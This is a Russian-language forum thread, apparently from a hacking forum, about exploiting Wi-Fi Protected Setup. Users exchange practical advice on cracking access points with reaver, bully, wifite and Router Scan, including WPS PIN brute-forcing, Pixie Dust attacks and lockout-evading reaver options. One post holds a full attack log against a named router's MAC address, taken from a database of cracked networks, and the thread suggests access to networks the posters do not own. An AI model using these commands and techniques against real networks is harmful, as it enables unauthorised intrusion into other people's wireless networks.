Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. DSL2650NRU

    DSL2650NRU Active Member

    Joined:
    12 Apr 2016
    Messages:
    373
    Likes Received:
    256
    Reputations:
    1
    У Open-WRT нет впс.
     
  2. Mr Drill

    Mr Drill New Member

    Joined:
    25 Aug 2015
    Messages:
    76
    Likes Received:
    3
    Reputations:
    0
    Это Static PIN - Cisco, с таким пином легче иголку в стоге сена найти.
    Ошибаетесь, путаете с DD-WRT. У DD-WRT WPS не реализован, но непонятно почему, поскольку эта система исходником имела ОС от подразделения Linksys. Зато WDS в отличие от исходника там есть. В Open-WRT можно включить WPS как в виде PBC, так и в виде с установленным PIN, чтобы всё было как у людей.
     
    #4462 Mr Drill, 10 Nov 2018
    Last edited: 10 Nov 2018
    binarymaster likes this.
  3. DSL2650NRU

    DSL2650NRU Active Member

    Joined:
    12 Apr 2016
    Messages:
    373
    Likes Received:
    256
    Reputations:
    1
    :) Не знал, что вртшники дописали эту дыру для любителей извращений.
     
    binarymaster likes this.
  4. DSL2650NRU

    DSL2650NRU Active Member

    Joined:
    12 Apr 2016
    Messages:
    373
    Likes Received:
    256
    Reputations:
    1
    С оуи f8:63:94 в базе 3wifi треть роутеров с таким пином
     
    binarymaster likes this.
  5. Mr Drill

    Mr Drill New Member

    Joined:
    25 Aug 2015
    Messages:
    76
    Likes Received:
    3
    Reputations:
    0
    За себя говори. Устройства, у которых ввод парольной фразы не предусмотрен в принципе, подключить возможно только с WPS. Да и смартфоны подключаются гораздо проще через WPS. Подозреваю, что и в DD-WRT можно эту нужную функцию включить, только как-то замороченно, чтоб жизнь сказкой не казалась DD-шникам.
    Ну, значит гражданин Lpopov нас и рассудит.
     
  6. Lpopov

    Lpopov New Member

    Joined:
    8 Nov 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо за пин, но его уже вводил ранее. Да и Ривер сам его первым делом вставляет и с него начинает перебор
     
  7. Lpopov

    Lpopov New Member

    Joined:
    8 Nov 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Почему ривером и аирокреком не получилось открыть..
    Но связка wifite с bully сработали лучше и через хендшейк была открыта ещё одна сеть.
    Благодарю за помощь!
     
  8. Mr Drill

    Mr Drill New Member

    Joined:
    25 Aug 2015
    Messages:
    76
    Likes Received:
    3
    Reputations:
    0
    Ну вот, гражданин Lpopov нас и рассудил. Значит я был во всём прав, а вы - нет.
     
  9. Mr Drill

    Mr Drill New Member

    Joined:
    25 Aug 2015
    Messages:
    76
    Likes Received:
    3
    Reputations:
    0
    Ну, может вы риву самую натуральную использовали, а не её форк https://code.google.com/p/reaver-wps-fork/ или https://github.com/t6x/reaver-wps-fork-t6x. Если bully отработал, а он - старый инструмент. Может, у вас комплект какой-то попался со старой ривой. У форка можно варьировать интервалы атак и реакции на таймауты ТД.
     
    #4469 Mr Drill, 12 Nov 2018
    Last edited: 12 Nov 2018
    Triton_Mgn likes this.
  10. Lpopov

    Lpopov New Member

    Joined:
    8 Nov 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Может и натуральную, много не разбирался. Взял с сайта дистрибутив Kali light скачал на флешку, а в нем уже apt-get install reaver и тд. Просто не знал что ривер с калиевского репа будет обрезанный..
     
  11. 10NG0

    10NG0 New Member

    Joined:
    19 Jun 2018
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    а никто случаем не подскажет, как распознать фейк ТД, от не фейк.
    ТД эта включается только по вечерам. С 8ми вечера, до 8 утра.
    в базе 3wifi висит, как найденный. 1C:BD:B9:BF:6E:88
    wps есть.
    key естественно уже не подходит из базы, староват.
    слышал, что есть фиш ТД, с названиями типа DIR-300 , ASUS и т.п.
    через jumpstart легко входит, по pin, вход подтверждается, какие-то глюканы при входе.
    может кто-то шаманит или фишует кого-то(получается что меня :D )?
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,482
    Likes Received:
    9,379
    Reputations:
    117
    Уже по этому признаку можно точно сказать, что точка не левая.

    Просто забудьте про JumpStart и используйте Router Scan для подключения по WPS.
     
    Genrix-936 and USER_X like this.
  13. 10NG0

    10NG0 New Member

    Joined:
    19 Jun 2018
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    У меня проблемы в Router Scan с Pixie Dust Attack.
    Вопрос: Функция Obtain key with WPS может работать если адаптер не может входить в режим мониторинга и инжектить?
    вроде писали, что работает и так, мол это не зависит от этого, но все-таки.
    **************************************************************************
    WPS 1.0 на TД есть, еще почему-то не от одной ТД WPS PIN через Pixie dust не нашлось.

    к которым доступ я находил через pin, я в ручную тыкал WPS Pin Companion, если был пин в списке я его брал, а потом через JumpStart подключался к сети.


    Code:
    [*] Audit started at 2018.11.16 08:28:00 (UTC+04:00).
    [*] Associating with AP...
    [+] Associated with 1C:BD:B9:BF:6E:88 (ESSID: dlink-46).
    [*] Trying pin "84358127"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: F2169DB3E0ED0860E8155C3F4B201958
    [*] PKE: 39338CCA7FA5246202C4ED592AD3511A836F41F5A55501A6352CD04F8757E81BA08A0EAF9E283182B96F18054192E4DEAE482055CBC7A594C6910D7C00EF95E661BE0ED21BE5B248670912B56434B866E293AD1C9EED784F8AB79B46672366478A68DE2B933412690381F2700E028AD2655C9C78C681A90B164A605FD903E31E0E3D24A51E15F39DC1C101A5942B3AA9EC055268095663F9FC7EEEF83C82638F3FF5899EC8CB2EB2BE014E1A95F19262AC1ACB94AF34DF4D01716C6EC5143CEE
    [*] Manufacturer: D-Link
    [*] Model Name: DIR-300
    [*] Model Number: DIR-300
    [*] Serial Number: 00000000
    [*] Device Name: DIR-300
    [*] Sending WPS Message M2...
    [*] PKR: D687A72A8988BF2383B34A13086E0E873B8B1769B5951FD48CC091525C4D97A10CC60904ECF76CF82D49C5D3CD103DABB418FB494DF23B780945888152AE74AD1118893757F471B27F15788F9AE78731207E47AE85507560105A855496A0944B664CC2ADC5DBC5072F50ACC465F97BDA00DACD14B10BD6461E6924BD95F2B59B5B69F767B5629A715FF52C784090ED246A6DFF166AE08A467319EE5A0C23B6E8629C26F6BC34ABDC67DB90D1B99F86CB53F06EFFB82AD7627B648895F5B64152
    [*] AuthKey: D3E5B125B53E8BCB8B2A3EBCC6C75AFC6682382BD8EE5CF8C4711BA8A46ABD26
    [*] Received WPS Message M3.
    [*] E-Hash1: 037C2A8D8757E8DDFD9D08C0454A0DB0C3B8AA168EE0727EF95248473AC54005
    [*] E-Hash2: D60296267A713DC337B34333F641DF0D57D53697E4F5811876BAAF75EA149BF9
    [*] Sending WPS Message M4...
    [-] Request timed out.
    [*] Sending WPS Message M4...
    [-] Request timed out.
    [*] Sending WPS Message M4...
    [-] Session timed out.
    [*] Starting Pixie Dust attack...
    [-] Pixie Dust PIN not found.
    [*] Trying pin "84358127"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin "84358127"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin "84358127"...
    [*] Sending EAPOL Start...
    [*] Received WPS Message M1.
    [*] Received Identity Request.
    [*] Sending WPS Message M2...
    [-] Request timed out.
    [*] Sending WPS Message M2...
    [-] Request timed out.
    [*] Sending WPS Message M2...
    [-] Session timed out.
    [*] Trying pin "84358127"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] Sending WPS Message M2...
    [*] Received WPS Message M3.
    [*] Sending WPS Message M4...
    [-] Request timed out.
    [*] Sending WPS Message M4...
    [-] Request timed out.
    [*] Sending WPS Message M4...
    [*] Sending WPS Message M4...
    [*] Audit stopped at 2018.11.16 08:30:16 (UTC+04:00).
     
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,482
    Likes Received:
    9,379
    Reputations:
    117
    В прикреплённом логе D-Link DIR-300, он к Pixie Dust не уязвим, и его придётся перебирать полным перебором.

    Насчёт других устройств ничего не могу сказать, нужны логи.
    Удалите JumpStart, он может конфликтовать с RS. Подключаться по пину можно и нужно тем же способом (через Router Scan).
     
    USER_X and 10NG0 like this.
  15. 10NG0

    10NG0 New Member

    Joined:
    19 Jun 2018
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    я через JS могу точечно пробовать по одной штуке PIN, заходить в точку.

    А в RS какие-то трудности. Вот мне выдается через WPS GEN 15 штук PIN, может RS мне их перебрать как-то или же нет?
    Может у меня настры в "more" не правильные. В OBTAIN KEY with WPS Он у меня тупо в 1 пин до победного долбится и все, а другие 14 из листа даже не трогает.
    У меня точка не пробиваемая, единственный вариант это пробовать перебирать WPS PIN к ней, так как режим мониторинга чип не держит и хендшейк невозможен.
    Тем более wps на ТД включен, но неизвестен.
    А он либо не создан для перебора (obtain key with wps), либо я что-то делаю не так.

    sets

    [​IMG]
     
  16. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,482
    Likes Received:
    9,379
    Reputations:
    117
    Ну а кто мешает список пинов очистить, и записать туда один? Список то редактируемый. :)
     
    USER_X, quite gray, Toroid and 2 others like this.
  17. glestwid

    glestwid New Member

    Joined:
    30 Dec 2010
    Messages:
    63
    Likes Received:
    1
    Reputations:
    0
    День добрый, подскажите чем WPS 2.0 отличается от WPS 1.0 , и есть ли там Pixie уязвимость ?
     
  18. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,482
    Likes Received:
    9,379
    Reputations:
    117
    Кардинальных отличий нет, 2.0 блокируется быстрее. Уязвимость присутствовать может.
     
    quite gray likes this.
  19. CRACK211

    CRACK211 Well-Known Member

    Joined:
    16 Sep 2009
    Messages:
    842
    Likes Received:
    897
    Reputations:
    4
    Нашел такую команду и видео. Может кто попробовать на tp-link
    Всё очень просто
    -T, --m57-timeout=<seconds>
    -d, --delay=<seconds>
    -t, --timeout=<seconds>
    команда примет такой вид
    reaver -i mon0 -b 00;11;11;11;11;11 -c 12 -vv -m57-timeout=20 --delay=20 --timeout=20
    советую в комплексе использовать очень важная команда --delay. Остальные для успокоение души.
    п.с советую начать не с 20, а с 50 или 100
    читайте мануалы к программам, вот что я вам скажуhttps://yadi.sk/i/dNudz5D9jKzpT
     
    quite gray likes this.
  20. quite gray

    quite gray Well-Known Member

    Joined:
    8 Dec 2016
    Messages:
    329
    Likes Received:
    1,403
    Reputations:
    3
    Блокируются быстрее и надолго, либо до перезагрузки роутера владельцем. К атаке PixieDust уязвимы лишь некоторые от производителей Broadcom, Ralink, Realtek (из личного опыта).
     
Loading...